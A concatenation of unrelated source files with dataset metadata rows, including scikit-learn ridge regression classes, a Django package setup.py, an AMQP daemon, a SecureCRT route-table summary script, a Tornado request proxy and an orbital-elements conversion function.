I = sparse.lil_matrix((n_features, n_features))
I.setdiag(np.ones(n_features) * alpha)
coef = _solve(X.T * X + I, X.T * y, solver, tol)
else:
if n_features > n_samples or \
isinstance(sample_weight, np.ndarray) or \
sample_weight != 1.0:
# kernel ridge
# w = X.T * inv(X X^t + alpha*Id) y
A = np.dot(X, X.T)
A.flat[::n_samples + 1] += alpha * sample_weight
coef = np.dot(X.T, _solve(A, y, solver, tol))
else:
# ridge
# w = inv(X^t X + alpha*Id) * X.T y
A = np.dot(X.T, X)
A.flat[::n_features + 1] += alpha
coef = _solve(A, np.dot(X.T, y), solver, tol)
return coef.T
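# Minimal call sketch for the helper above (shapes are illustrative; intercept
# handling is what the Ridge estimator below adds on top):
#   w = ridge_regression(X, y, alpha=1.0)   # w.shape == (n_features,) for 1-d y
#   y_hat = np.dot(X, w)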
class Ridge(LinearModel):
"""Linear least squares with l2 regularization.
This model solves a regression model where the loss function is
the linear least squares function and regularization is given by
the l2-norm. Also known as Ridge Regression or Tikhonov regularization.
This estimator has built-in support for multi-variate regression
(i.e., when y is a 2d-array of shape [n_samples, n_responses]).
Parameters
----------
alpha : float
Small positive values of alpha improve the conditioning of the
problem and reduce the variance of the estimates.
Alpha corresponds to (2*C)^-1 in other linear models such as
LogisticRegression or LinearSVC.
fit_intercept : boolean
Whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional
If True, the regressors X are normalized
copy_X : boolean, optional, default True
If True, X will be copied; else, it may be overwritten.
tol: float
Precision of the solution.
Attributes
----------
`coef_` : array, shape = [n_features] or [n_responses, n_features]
Weight vector(s).
See also
--------
RidgeClassifier, RidgeCV
Examples
--------
>>> from sklearn.linear_model import Ridge
>>> import numpy as np
>>> n_samples, n_features = 10, 5
>>> np.random.seed(0)
>>> y = np.random.randn(n_samples)
>>> X = np.random.randn(n_samples, n_features)
>>> clf = Ridge(alpha=1.0)
>>> clf.fit(X, y) # doctest: +NORMALIZE_WHITESPACE
Ridge(alpha=1.0, copy_X=True, fit_intercept=True, normalize=False,
tol=0.001)
"""
def __init__(self, alpha=1.0, fit_intercept=True, normalize=False,
copy_X=True, tol=1e-3):
self.alpha = alpha
self.fit_intercept = fit_intercept
self.normalize = normalize
self.copy_X = copy_X
self.tol = tol
def fit(self, X, y, sample_weight=1.0, solver='auto'):
"""Fit Ridge regression model
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training data
y : array-like, shape = [n_samples] or [n_samples, n_responses]
Target values
sample_weight : float or numpy array of shape [n_samples]
Individual weights for each sample
solver : {'auto', 'dense_cholesky', 'sparse_cg'}
Solver to use in the computational
            routines. 'dense_cholesky' will use the standard
            scipy.linalg.solve function, 'sparse_cg' will use a
            conjugate gradient solver as found in
            scipy.sparse.linalg.cg, while 'auto' will choose the most
            appropriate depending on the matrix X.
Returns
-------
self : returns an instance of self.
"""
X = safe_asarray(X, dtype=np.float)
y = np.asarray(y, dtype=np.float)
X, y, X_mean, y_mean, X_std = \
self._center_data(X, y, self.fit_intercept,
self.normalize, self.copy_X)
self.coef_ = ridge_regression(X, y, self.alpha, sample_weight,
solver, self.tol)
self._set_intercept(X_mean, y_mean, X_std)
return self
class RidgeClassifier(Ridge):
"""Classifier using Ridge regression.
Parameters
----------
alpha : float
Small positive values of alpha improve the conditioning of the
problem and reduce the variance of the estimates.
Alpha corresponds to (2*C)^-1 in other linear models such as
LogisticRegression or LinearSVC.
fit_intercept : boolean
Whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional
If True, the regressors X are normalized
copy_X : boolean, optional, default True
If True, X will be copied; else, it may be overwritten.
tol: float
Precision of the solution.
Attributes
----------
`coef_` : array, shape = [n_features] or [n_classes, n_features]
Weight vector(s).
See also
--------
Ridge, RidgeClassifierCV
Notes
-----
For multi-class classification, n_class classifiers are trained in
a one-versus-all approach. Concretely, this is implemented by taking
advantage of the multi-variate response support in Ridge.
"""
def fit(self, X, y, solver='auto'):
"""Fit Ridge regression model.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples,n_features]
Training data
y : array-like, shape = [n_samples]
Target values
solver : {'auto', 'dense_cholesky', 'sparse_cg'}
Solver to use in the computational
            routines. 'dense_cholesky' will use the standard
            scipy.linalg.solve function, 'sparse_cg' will use a
            conjugate gradient solver as found in
            scipy.sparse.linalg.cg, while 'auto' will choose the most
            appropriate depending on the matrix X.
Returns
-------
self : returns an instance of self.
"""
self.label_binarizer = LabelBinarizer()
Y = self.label_binarizer.fit_transform(y)
Ridge.fit(self, X, Y, solver=solver)
return self
def decision_function(self, X):
return Ridge.decision_function(self, X)
def predict(self, X):
"""Predict target values according to the fitted model.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Returns
-------
y : array, shape = [n_samples]
"""
Y = self.decision_function(X)
return self.label_binarizer.inverse_transform(Y)
class _RidgeGCV(LinearModel):
"""Ridge regression with built-in Generalized Cross-Validation
It allows efficient Leave-One-Out cross-validation.
This class is not intended to be used directly. Use RidgeCV instead.
Notes
-----
We want to solve (K + alpha*Id)c = y,
where K = X X^T is the kernel matrix.
Let G = (K + alpha*Id)^-1.
Dual solution: c = Gy
Primal solution: w = X^T c
Compute eigendecomposition K = Q V Q^T.
Then G = Q (V + alpha*Id)^-1 Q^T,
where (V + alpha*Id) is diagonal.
It is thus inexpensive to inverse for many alphas.
Let loov be the vector of prediction values for each example
when the model was fitted with all examples but this example.
loov = (KGY - diag(KG)Y) / diag(I-KG)
Let looe be the vector of prediction errors for each example
when the model was fitted with all examples but this example.
looe = y - loov = c / diag(G)
**References**:
http://cbcl.mit.edu/projects/cbcl/publications/ps/MIT-CSAIL-TR-2007-025.pdf
http://www.mit.edu/~9.520/spring07/Classes/rlsslides.pdf
"""
def __init__(self, alphas=[0.1, 1.0, 10.0], fit_intercept=True,
normalize=False, score_func=None, loss_func=None, copy_X=True):
self.alphas = np.asarray(alphas)
self.fit_intercept = fit_intercept
self.normalize = normalize
self.score_func = score_func
self.loss_func = loss_func
self.copy_X = copy_X
def _pre_compute(self, X, y):
# even if X is very sparse, K is usually very dense
K = safe_sparse_dot(X, X.T, dense_output=True)
from scipy import linalg
v, Q = linalg.eigh(K)
return K, v, Q
def _errors(self, v, Q, y, alpha):
G = np.dot(np.dot(Q, np.diag(1.0 / (v + alpha))), Q.T)
c = np.dot(G, y)
G_diag = np.diag(G)
# handle case when y is 2-d
G_diag = G_diag if len(y.shape) == 1 else G_diag[:, np.newaxis]
return (c / G_diag) ** 2, c
def _values(self, K, v, Q, y, alpha):
n_samples = y.shape[0]
G = np.dot(np.dot(Q, np.diag(1.0 / (v + alpha))), Q.T)
c = np.dot(G, y)
KG = np.dot(K, G)
#KG = np.dot(np.dot(Q, np.diag(v / (v + alpha))), Q.T)
KG_diag = np.diag(KG)
denom = np.ones(n_samples) - KG_diag
if len(y.shape) == 2:
# handle case when y is 2-d
KG_diag = KG_diag[:, np.newaxis]
denom = denom[:, np.newaxis]
num = np.dot(KG, y) - KG_diag * y
return num / denom, c
def fit(self, X, y, sample_weight=1.0):
"""Fit Ridge regression model
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training data
y : array-like, shape = [n_samples] or [n_samples, n_responses]
Target values
sample_weight : float or array-like of shape [n_samples]
Sample weight
Returns
-------
self : Returns self.
"""
X = safe_asarray(X, dtype=np.float)
y = np.asarray(y, dtype=np.float)
n_samples = X.shape[0]
X, y, X_mean, y_mean, X_std = LinearModel._center_data(X, y,
self.fit_intercept, self.normalize, self.copy_X)
K, v, Q = self._pre_compute(X, y)
n_y = 1 if len(y.shape) == 1 else y.shape[1]
M = np.zeros((n_samples * n_y, len(self.alphas)))
C = []
error = self.score_func is None and self.loss_func is None
for i, alpha in enumerate(self.alphas):
if error:
out, c = self._errors(v, Q, y, sample_weight * alpha)
else:
out, c = self._values(K, v, Q, y, sample_weight * alpha)
M[:, i] = out.ravel()
C.append(c)
if error:
best = M.mean(axis=0).argmin()
else:
func = self.score_func if self.score_func else self.loss_func
out = [func(y.ravel(), M[:, i]) for i in range(len(self.alphas))]
best = np.argmax(out) if self.score_func else np.argmin(out)
self.best_alpha = self.alphas[best]
self.dual_coef_ = C[best]
self.coef_ = safe_sparse_dot(self.dual_coef_.T, X)
self._set_intercept(X_mean, y_mean, X_std)
return self
class RidgeCV(LinearModel):
"""Ridge regression with built-in cross-validation.
By default, it performs Generalized Cross-Validation, which is a form of
efficient Leave-One-Out cross-validation. Currently, only the n_features >
n_samples case is handled efficiently.
Parameters
----------
alphas: numpy array of shape [n_alpha]
Array of alpha values to try.
Small positive values of alpha improve the conditioning of the
problem and reduce the variance of the estimates.
Alpha corresponds to (2*C)^-1 in other linear models such as
LogisticRegression or LinearSVC.
fit_intercept : boolean
Whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional
If True, the regressors X are normalized
score_func: callable, optional
function that takes 2 arguments and compares them in
        order to evaluate the performance of prediction (big is good)
if None is passed, the score of the estimator is maximized
loss_func: callable, optional
function that takes 2 arguments and compares them in
        order to evaluate the performance of prediction (small is good)
if None is passed, the score of the estimator is maximized
cv : cross-validation generator, optional
        If None, Generalized Cross-Validation (efficient Leave-One-Out)
will be used.
See also
--------
Ridge, RidgeClassifierCV
"""
def __init__(self, alphas=np.array([0.1, 1.0, 10.0]), fit_intercept=True,
normalize=False, score_func=None, loss_func=None, cv=None):
self.alphas = alphas
self.fit_intercept = fit_intercept
self.normalize = normalize
self.score_func = score_func
self.loss_func = loss_func
self.cv = cv
def fit(self, X, y, sample_weight=1.0):
"""Fit Ridge regression model
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training data
y : array-like, shape = [n_samples] or [n_samples, n_responses]
Target values
sample_weight : float or array-like of shape [n_samples]
Sample weight
Returns
-------
self : Returns self.
"""
if self.cv is None:
estimator = _RidgeGCV(self.alphas, self.fit_intercept,
self.score_func, self.loss_func)
estimator.fit(X, y, sample_weight=sample_weight)
self.best_alpha = estimator.best_alpha
else:
parameters = {'alpha': self.alphas}
# FIXME: sample_weight must be split into training/validation data
# too!
#fit_params = {'sample_weight' : sample_weight}
fit_params = {}
gs = GridSearchCV(Ridge(fit_intercept=self.fit_intercept),
parameters, fit_params=fit_params, cv=self.cv)
gs.fit(X, y)
estimator = gs.best_estimator_
self.best_alpha = gs.best_estimator_.alpha
self.coef_ = estimator.coef_
self.intercept_ = estimator.intercept_
return self
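    # Illustrative use (data and alphas are assumptions):
    #   clf = RidgeCV(alphas=[0.1, 1.0, 10.0]).fit(X, y)
    #   clf.best_alpha          # alpha selected by (generalized) cross-validation
    #   y_hat = clf.predict(X)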
class RidgeClassifierCV(RidgeCV):
def fit(self, X, y, sample_weight=1.0, class_weight=None):
"""Fit the ridge classifier.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples
and n_features is the number of features.
y : array-like, shape = [n_samples]
Target values.
sample_weight : float or numpy array of shape [n_samples]
Sample weight
class_weight : dict, optional
Weights associated with classes in the form
{class_label : weight}. If not given, all classes are
supposed to have weight one.
Returns
-------
self : object
Returns self.
"""
if class_weight is None:
class_weight = {}
sample_weight2 = np.array([class_weight.get(k, 1.0) for k in y])
self.label_binarizer = LabelBinarizer()
Y = self.label_binarizer.fit_transform(y)
RidgeCV.fit(self, X, Y,
sample_weight=sample_weight * sample_weight2)
return self
def decision_function(self, X):
return RidgeCV.decision_function(self, X)
def predict(self, X):
"""Predict target values according to the fitted model.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Returns
-------
y : array, shape = [n_samples]
"""
Y = self.decision_function(X)
return self.label_binarizer.inverse_transform(Y)
| bsd-3-clause | -420,045,437,906,127,550 | 31.157983 | 79 | 0.580799 | false |
davidvicenteranz/drf-api-dump | setup.py | 1 | 1451 | # -*- coding: utf-8 -*-
from setuptools import setup
DESCRIPTION = """
This Django app is intended for **dumping data from apps or models via HTTP**. Basically it exposes
the dumpdata command over HTTP.
Features:
- Just accesible by superusers
- Ability to include or exclude any specific app or model
Requirements:
- Django (Developed under v1.11)
- Django Rest Framework (Developed under v3.4.3)
More on https://github.com/davidvicenteranz/drf-api-dump/
"""
setup(
name='drf-api-dump',
version='0.1.3',
author='David Vicente Ranz',
author_email='[email protected]',
include_package_data=True,
packages=[
'drf_api_dump'
],
url='https://github.com/davidvicenteranz/drf-api-dump/',
license='MIT license',
description='Dumps data from apps or models via HTTP',
long_description=DESCRIPTION,
install_requires=[
'djangorestframework'
],
keywords='django dumpdata development',
classifiers=(
'Framework :: Django',
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Topic :: Software Development :: Libraries :: Python Modules'
),
) | mit | -2,079,235,607,391,890,700 | 27.470588 | 93 | 0.641626 | false |
edeposit/edeposit.amqp | bin/edeposit_amqp_ltpd.py | 1 | 2504 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Interpreter version: python 2.7
#
# Imports =====================================================================
"""
AMQP binding for LTP exporter. See `edeposit.amqp.ltp
<https://github.com/edeposit/edeposit.amqp.ltp>`_ for details.
"""
import os
import sys
import os.path
import argparse
from pika.exceptions import ConnectionClosed
from edeposit.amqp.ltp import *
# if the amqp module wasn't yet installed at this system, load it from package
try:
from edeposit.amqp import settings
except ImportError:
sys.path.insert(0, os.path.abspath('../edeposit/'))
import amqp
sys.modules["edeposit.amqp"] = amqp
from edeposit.amqp.amqpdaemon import AMQPDaemon, getConParams
from edeposit.amqp import settings
# Functions & objects =========================================================
def main(args, stop=False):
"""
Arguments parsing, etc..
"""
daemon = AMQPDaemon(
con_param=getConParams(
settings.RABBITMQ_LTP_VIRTUALHOST
),
queue=settings.RABBITMQ_LTP_INPUT_QUEUE,
out_exch=settings.RABBITMQ_LTP_EXCHANGE,
out_key=settings.RABBITMQ_LTP_OUTPUT_KEY,
react_fn=reactToAMQPMessage,
glob=globals() # used in deserializer
)
if not stop and args.foreground: # run at foreground
daemon.run()
else:
daemon.run_daemon() # run as daemon
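# Typical invocations (illustrative):
#   edeposit_amqp_ltpd.py start       # run as a daemon
#   edeposit_amqp_ltpd.py start -f    # stay in the foreground
#   edeposit_amqp_ltpd.py stop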
# Main program ================================================================
if __name__ == '__main__':
if len(sys.argv) > 1 and sys.argv[1] == "stop":
main(None, stop=True)
sys.exit(0)
parser = argparse.ArgumentParser(
usage='%(prog)s start/stop/restart [-f/--foreground]',
description="""AMQP daemon for LTP exporter."""
)
parser.add_argument(
"action",
metavar="start/stop/restart",
type=str,
default=None,
help="Start/stop/restart the daemon."
)
parser.add_argument(
"-f",
'--foreground',
action="store_true",
required=False,
help="""Run at foreground, not as daemon. If not set, script is will
run at background as unix daemon."""
)
args = parser.parse_args()
try:
main(args)
except ConnectionClosed as e:
sys.stderr.write(
e.message + " - is the RabbitMQ queues properly set?\n"
)
sys.exit(1)
except KeyboardInterrupt:
pass
| gpl-2.0 | 4,022,404,615,706,803,700 | 26.217391 | 79 | 0.567492 | false |
garibaldi0/SecureCRT | s_nexthop_summary.py | 1 | 13227 | # $language = "python"
# $interface = "1.0"
import os
import sys
import logging
# Add script directory to the PYTHONPATH so we can import our modules (only if run from SecureCRT)
if 'crt' in globals():
script_dir, script_name = os.path.split(crt.ScriptFullName)
if script_dir not in sys.path:
sys.path.insert(0, script_dir)
else:
script_dir, script_name = os.path.split(os.path.realpath(__file__))
# Now we can import our custom modules
from securecrt_tools import scripts
from securecrt_tools import utilities
from securecrt_tools import ipaddress
# Create global logger so we can write debug messages from any function (if debug mode setting is enabled in settings).
logger = logging.getLogger("securecrt")
logger.debug("Starting execution of {0}".format(script_name))
# ################################################ SCRIPT LOGIC ###################################################
def script_main(session, ask_vrf=True, vrf=None):
"""
| SINGLE device script
| Author: Jamie Caesar
| Email: [email protected]
This script will grab the route table information from a Cisco IOS or NXOS device and export details about each
next-hop address (how many routes and from which protocol) into a CSV file. It will also list all connected
networks and give a detailed breakdown of every route that goes to each next-hop.
:param session: A subclass of the sessions.Session object that represents this particular script session (either
SecureCRTSession or DirectSession)
:type session: sessions.Session
:param ask_vrf: A boolean that specifies if we should prompt for which VRF. The default is true, but when this
        module is called from other scripts, we may want to avoid prompting and supply the VRF with the "vrf" input.
:type ask_vrf: bool
:param vrf: The VRF that we should get the route table from. This is used only when ask_vrf is False.
:type vrf: str
"""
# Get script object that owns this session, so we can check settings, get textfsm templates, etc
script = session.script
# Start session with device, i.e. modify term parameters for better interaction (assuming already connected)
session.start_cisco_session()
# Validate device is running a supported OS
session.validate_os(["IOS", "NXOS"])
# If we should prompt for a VRF, then do so. Otherwise use the VRF passed into the function (if any)
if ask_vrf:
selected_vrf = script.prompt_window("Enter the VRF name. (Leave blank for default VRF)")
else:
selected_vrf = vrf
# If we have a VRF, modify our commands and hostname to reflect it. If not, pull the default route table.
if selected_vrf:
send_cmd = "show ip route vrf {0}".format(selected_vrf)
session.hostname = session.hostname + "-VRF-{0}".format(selected_vrf)
logger.debug("Received VRF: {0}".format(selected_vrf))
else:
send_cmd = "show ip route"
raw_routes = session.get_command_output(send_cmd)
if session.os == "IOS":
template_file = script.get_template("cisco_ios_show_ip_route.template")
else:
template_file = script.get_template("cisco_nxos_show_ip_route.template")
fsm_results = utilities.textfsm_parse_to_dict(raw_routes, template_file)
route_list = parse_routes(fsm_results)
output_filename = session.create_output_filename("nexthop-summary", ext=".csv")
output = nexthop_summary(route_list)
utilities.list_of_lists_to_csv(output, output_filename)
# Return terminal parameters back to the original state.
session.end_cisco_session()
def update_empty_interfaces(route_table):
"""
Takes the routes table as a list of dictionaries (with dict key names used in parse_routes function) and does
recursive lookups to find the outgoing interface for those entries in the route-table where the outgoing interface
isn't listed.
:param route_table: Route table information as a list of dictionaries (output from TextFSM)
:type route_table: list of dict
:return: The updated route_table object with outbound interfaces filled in.
:rtype: list of dict
"""
def recursive_lookup(nexthop):
"""
Recursively looks up a route to find the actual next-hop on a connected network.
:param nexthop: The next-hop IP that we are looking for
:type nexthop: securecrt_tools.ipaddress
:return: The directly connected next-hop for the input network.
:rtype: securecrt_tools.ipaddress
"""
for network in connected:
if nexthop in network:
return connected[network]
for network in statics:
if nexthop in network:
return recursive_lookup(statics[network])
return None
logger.debug("STARTING update_empty_interfaces")
connected = {}
unknowns = {}
statics = {}
for route in route_table:
if route['protocol'] == 'connected':
connected[route['network']] = route['interface']
if route['protocol'] == 'static':
if route['nexthop']:
statics[route['network']] = route['nexthop']
if route['nexthop'] and not route['interface']:
unknowns[route['nexthop']] = None
for nexthop in unknowns:
unknowns[nexthop] = recursive_lookup(nexthop)
for route in route_table:
if not route['interface']:
if route['nexthop'] in unknowns:
route['interface'] = unknowns[route['nexthop']]
logger.debug("ENDING update_empty_interfaces")
def parse_routes(fsm_routes):
"""
This function will take the TextFSM parsed route-table from the `textfsm_parse_to_dict` function. Each dictionary
in the TextFSM output represents a route entry. Each of these dictionaries will be updated to convert IP addresses
    into ip_address or ip_network objects (from the ipaddress.py module). Some key names will also be updated.
:param fsm_routes: TextFSM output from the `textfsm_parse_to_dict` function.
:type fsm_routes: list of dict
:return: An updated list of dictionaries that replaces IP address strings with objects from the ipaddress.py module
:rtype: list of dict
"""
logger.debug("STARTING parse_routes function.")
complete_table = []
for route in fsm_routes:
new_entry = {}
logger.debug("Processing route entry: {0}".format(str(route)))
new_entry['network'] = ipaddress.ip_network(u"{0}/{1}".format(route['NETWORK'], route['MASK']))
new_entry['protocol'] = utilities.normalize_protocol(route['PROTOCOL'])
if route['NEXTHOP_IP'] == '':
new_entry['nexthop'] = None
else:
new_entry['nexthop'] = ipaddress.ip_address(unicode(route['NEXTHOP_IP']))
if route["NEXTHOP_IF"] == '':
new_entry['interface'] = None
else:
new_entry['interface'] = route['NEXTHOP_IF']
# Nexthop VRF will only occur in NX-OS route tables (%vrf-name after the nexthop)
if 'NEXTHOP_VRF' in route:
if route['NEXTHOP_VRF'] == '':
new_entry['vrf'] = None
else:
new_entry['vrf'] = route['NEXTHOP_VRF']
logger.debug("Adding updated route entry '{0}' based on the information: {1}".format(str(new_entry),
str(route)))
complete_table.append(new_entry)
update_empty_interfaces(complete_table)
logger.debug("ENDING parse_route function")
return complete_table
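# Illustrative sketch (added; not part of the original script): the rough shape of
# the TextFSM output that parse_routes() expects. The values are placeholders, not
# captured device output; protocol codes are normalized by utilities.normalize_protocol.
def _example_parse_routes():
    fsm_routes = [{
        "NETWORK": "10.10.0.0",
        "MASK": "24",
        "PROTOCOL": "S",
        "NEXTHOP_IP": "192.168.1.1",
        "NEXTHOP_IF": "",
    }]
    return parse_routes(fsm_routes)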
def nexthop_summary(textfsm_dict):
"""
A function that builds a CSV output (list of lists) that displays the summary information after analyzing the
input route table.
:param textfsm_dict: The route table information in list of dictionaries format.
:type textfsm_dict: list of dict
:return: The nexthop summary information in a format that can be easily written to a CSV file.
:rtype: list of lists
"""
    # Identify connected or other local networks -- mostly found in NX-OS -- to exclude from next-hops. These are
    # excluded from the nexthop summary (except connected, which gets its own section in the output).
logger.debug("STARTING nexthop_summary function")
local_protos = ['connected', 'local', 'hsrp', 'vrrp', 'glbp']
# Create a list of all dynamic protocols from the provided route table. Add total and statics to the front.
proto_list = []
for entry in textfsm_dict:
if entry['protocol'] not in proto_list and entry['protocol'] not in local_protos:
logger.debug("Found protocol '{0}' in the table".format(entry['protocol']))
proto_list.append(entry['protocol'])
proto_list.sort(key=utilities.human_sort_key)
proto_list.insert(0, 'total')
proto_list.insert(0, 'interface')
# Create dictionaries to store summary information as we process the route table.
summary_table = {}
connected_table = {}
detailed_table = {}
# Process the route table to populate the above 3 dictionaries.
for entry in textfsm_dict:
logger.debug("Processing route: {0}".format(str(entry)))
# If the route is connected, local or an FHRP entry
if entry['protocol'] in local_protos:
if entry['protocol'] == 'connected':
if entry['interface'] not in connected_table:
connected_table[entry['interface']] = []
connected_table[entry['interface']].append(str(entry['network']))
else:
if entry['nexthop']:
if 'vrf' in entry and entry['vrf']:
nexthop = "{0}%{1}".format(entry['nexthop'], entry['vrf'])
else:
nexthop = str(entry['nexthop'])
elif entry['interface'].lower() == "null0":
nexthop = 'discard'
if nexthop not in summary_table:
# Create an entry for this next-hop, containing zero count for all protocols.
summary_table[nexthop] = {}
summary_table[nexthop].update(zip(proto_list, [0] * len(proto_list)))
summary_table[nexthop]['interface'] = entry['interface']
# Increment total and protocol specific count
summary_table[nexthop][entry['protocol']] += 1
summary_table[nexthop]['total'] += 1
if nexthop not in detailed_table:
detailed_table[nexthop] = []
detailed_table[nexthop].append((str(entry['network']), entry['protocol']))
# Convert summary_table into a format that can be printed to the CSV file.
output = []
header = ["Nexthop", "Interface", "Total"]
header.extend(proto_list[2:])
output.append(header)
summary_keys = sorted(summary_table.keys(), key=utilities.human_sort_key)
for key in summary_keys:
line = [key]
for column in proto_list:
line.append(summary_table[key][column])
output.append(line)
output.append([])
# Convert the connected_table into a format that can be printed to the CSV file (and append to output)
output.append([])
output.append(["Connected:"])
output.append(["Interface", "Network(s)"])
connected_keys = sorted(connected_table.keys(), key=utilities.human_sort_key)
for key in connected_keys:
line = [key]
for network in connected_table[key]:
line.append(network)
output.append(line)
output.append([])
# Convert the detailed_table into a format that can be printed to the CSV file (and append to output)
output.append([])
output.append(["Route Details"])
output.append(["Nexthop", "Network", "Protocol"])
detailed_keys = sorted(detailed_table.keys(), key=utilities.human_sort_key)
for key in detailed_keys:
for network in detailed_table[key]:
line = [key]
line.extend(list(network))
output.append(line)
output.append([])
# Return the output, ready to be sent to directly to a CSV file
logger.debug("ENDING nexthop_summary function")
return output
# ################################################ SCRIPT LAUNCH ###################################################
# If this script is run from SecureCRT directly, use the SecureCRT specific class
if __name__ == "__builtin__":
# Initialize script object
crt_script = scripts.CRTScript(crt)
# Get session object for the SecureCRT tab that the script was launched from.
crt_session = crt_script.get_main_session()
# Run script's main logic against our session
script_main(crt_session)
# Shutdown logging after
logging.shutdown()
# If the script is being run directly, use the simulation class
elif __name__ == "__main__":
# Initialize script object
direct_script = scripts.DebugScript(os.path.realpath(__file__))
# Get a simulated session object to pass into the script.
sim_session = direct_script.get_main_session()
# Run script's main logic against our session
script_main(sim_session)
# Shutdown logging after
logging.shutdown()
| apache-2.0 | -3,942,150,797,001,814,000 | 40.46395 | 119 | 0.641113 | false |
alejandrobernardis/python-slot-machines | src/backend/backend/api/public/services.py | 1 | 3062 | #!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
# Copyright (c) 2014 Asumi Kamikaze Inc.
# Licensed under the MIT License.
# Author: Alejandro M. Bernardis
# Email: alejandro (dot) bernardis (at) asumikamikaze (dot) com
# Created: 02/Oct/2014 2:46 PM
from backend.api.base import BaseHandler
from tornado import gen
from tornado.httpclient import AsyncHTTPClient, HTTPRequest
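# ServiceHandler transparently proxies every public request to the internal API:
# the incoming URI is re-issued against "<api_domain>/s<original_uri>" with the
# same HTTP method, headers and body, and the upstream response body is written
# back to the client (see _get_url/_set_request below).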
class ServiceHandler(BaseHandler):
def _get_url(self, with_domain=True):
url = '/s' + self.request.uri
if with_domain:
url = self.api_domain('http') + url
return url
@gen.coroutine
def _set_request(self):
response = None
try:
request = HTTPRequest(self._get_url())
request.method = self.request.method
request.headers = self.request.headers
if self.request.method in ("POST", "DELETE", "PATCH", "PUT"):
request.body = self.request.body
response = yield AsyncHTTPClient().fetch(request)
self.write(response.body)
except Exception, e:
self.get_json_exception_response_and_finish(e)
raise gen.Return(response)
def prepare(self):
self.set_header_for_json()
def compute_etag(self):
return None
@gen.coroutine
def head(self, *args, **kwargs):
yield self._set_request()
@gen.coroutine
def get(self, *args, **kwargs):
yield self._set_request()
@gen.coroutine
def post(self, *args, **kwargs):
yield self._set_request()
@gen.coroutine
def delete(self, *args, **kwargs):
yield self._set_request()
@gen.coroutine
def patch(self, *args, **kwargs):
yield self._set_request()
@gen.coroutine
def put(self, *args, **kwargs):
yield self._set_request()
@gen.coroutine
def options(self, *args, **kwargs):
yield self._set_request()
handlers_list = [
(r'/sign/in(?P<uid>\/[a-z0-9]+)?/?', ServiceHandler),
(r'/sign/out/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/game/find_golden_eggs/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/game/roulette/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/game/slot/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/store/android/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/store/ios/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/media/nags/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/social/sync/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/social/gift/request/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/social/gift/send/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/social/invite/send/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/social/notifications/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/social/share/bonus/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/session/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/session/balance/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/session/bonus/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/session/slots/(?P<sid>[a-z0-9]+)/?', ServiceHandler)
]
| mit | -3,224,450,806,062,539,300 | 33.022222 | 73 | 0.59177 | false |
lasr/orbital_elements | convert/meeEl_meefl.py | 1 | 1858 | import numpy as np
__author__ = "Nathan I. Budd"
__email__ = "[email protected]"
__copyright__ = "Copyright 2017, LASR Lab"
__license__ = "MIT"
__version__ = "0.1"
__status__ = "Production"
__date__ = "08 Mar 2017"
def meeEl_meefl(meefl):
"""Convert MEEs with true longitude to eccentric longitude.
Args:
meefl: ndarray
(m, 6) array of modified equinoctial elements ordered as
(p, f, g, h, k, fl), where
p = semi-latus rectum
f = 1-component of eccentricity vector in perifocal frame
g = 2-component of eccentricity vector in perifocal frame
h = 1-component of the ascending node vector in equinoctial frame
k = 2-component of the ascending node vector in equinoctial frame
fl = true longitude
Returns:
meeEl: ndarray
(m, 6) array of modified equinoctial elements ordered as
(p, f, g, h, k, El), where
p = semi-latus rectum
f = 1-component of eccentricity vector in perifocal frame
g = 2-component of eccentricity vector in perifocal frame
h = 1-component of the ascending node vector in equinoctial frame
k = 2-component of the ascending node vector in equinoctial frame
El = eccentric longitude
"""
f = meefl[:, 1:2]
g = meefl[:, 2:3]
fl = meefl[:, 5:6]
e = (f**2 + g**2)**.5
B = ((1 + e) / (1 - e))**.5
tan_wbar_by_2 = ((e - f) / (e + f))**0.5
tan_fl_by_2 = np.tan(fl/2)
tan_E_by_2 = 1/B * ((tan_fl_by_2 - tan_wbar_by_2) /
(1 + tan_fl_by_2 * tan_wbar_by_2))
tan_El_by_2 = ((tan_E_by_2 + tan_wbar_by_2) /
(1 - tan_E_by_2 * tan_wbar_by_2))
El = np.mod((2*np.arctan(tan_El_by_2)), 2*np.pi)
return np.concatenate((meefl[:, 0:5], El), axis=1)
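# Illustrative usage sketch (added; not part of the original module). The numbers
# below are arbitrary placeholders, not a validated test case.
def _example_meeEl_meefl():
    meefl = np.array([[7000.0, 0.01, 0.02, 0.0, 0.0, 1.0]])
    return meeEl_meefl(meefl)  # (1, 6) array; column 5 holds the eccentric longitude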
| mit | 7,915,249,333,846,053,000 | 35.431373 | 77 | 0.55436 | false |
